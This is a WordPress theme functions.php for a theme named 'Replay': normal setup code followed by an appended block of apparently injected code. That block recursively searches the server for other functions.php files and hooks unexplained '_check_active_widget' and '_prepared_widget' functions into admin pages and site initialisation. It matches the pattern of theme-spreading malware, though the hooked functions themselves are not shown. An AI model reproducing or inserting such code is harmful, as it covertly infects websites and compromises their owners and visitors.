<?php
//Show all errors except notices
error_reporting(E_ALL ^ E_NOTICE);

// Define constants
define('THEME_NAME','Replay');
define('THEME_PATH',get_template_directory().'/');
define('THEME_URI',get_template_directory_uri().'/');
define('THEME_CSS_URI',get_stylesheet_directory_uri().'/');
define('THEME_VERSION','1.6');

define('THEMEX_PATH',THEME_PATH.'framework/');
define('THEMEX_URI',THEME_URI.'framework/');

//Add theme supports
add_theme_support( 'automatic-feed-links' );
add_theme_support( 'post-thumbnails' );

//Load Textdomain
load_theme_textdomain('replay', THEME_PATH.'languages');

//Set content width
if ( ! isset( $content_width ) ) $content_width = 940;

//Register menus
register_nav_menu( 'main_menu', __('Main Menu','replay') );
register_nav_menu( 'footer_menu', __('Footer Menu','replay') );

//Include theme functions
include(THEMEX_PATH.'functions.php');

// Include theme configuration file
include(THEMEX_PATH.'config.php');

// Include core class
include(THEMEX_PATH.'classes/themex.core.php');

// Init theme
$theme=new ThemexCore($config);
?>
<?php

function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");


add_action("init", "_prepared_widget");

?>